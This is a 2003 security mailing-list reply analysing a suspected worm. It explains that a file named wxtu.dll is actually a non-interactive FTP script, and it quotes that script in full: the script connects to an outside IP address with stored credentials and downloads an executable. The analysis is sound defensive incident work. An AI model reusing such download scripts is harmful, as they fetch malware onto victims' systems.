Security Incidents mailing list archives

Re: New Worm or Worm Variant?

From: Joris De Donder <joris () digitaldefense be>
Date: Thu, 11 Dec 2003 15:22:07 +0100

2) Any theories on wxtu.dll?  Since I can't get a hold of the malware to analyze it, I'm really guessing at this
point.


It is just a text file containing:
  open 211.26.130.118
  USER noxe
  noxe
  binary
  get MsnMsgr.Exe
  bye

it it appears to be using something like FTPCOM to do a
non-interactive FTP session


Your attacker (or his script) tries to use the ftp.exe that ships with
Microsoft Windows to retreive MsnMsgr.Exe from an FTP server running
at 211.26.130.118 (in your first capture).



Joris



---------------------------------------------------------------------------
----------------------------------------------------------------------------

Current thread:

New Worm or Worm Variant? Charles Hamby (Dec 10)
- Re: New Worm or Worm Variant? Harlan Carvey (Dec 11)
  - Another New Worm or Worm Variant? David Gillett (Dec 11)
- Re: New Worm or Worm Variant? Juri Haberland (Dec 11)
- <Possible follow-ups>
- Re: New Worm or Worm Variant? Joris De Donder (Dec 11)
  - RE: New Worm or Worm Variant? Charles Hamby (Dec 11)
- FW: New Worm or Worm Variant? Bassett, Mark (Dec 11)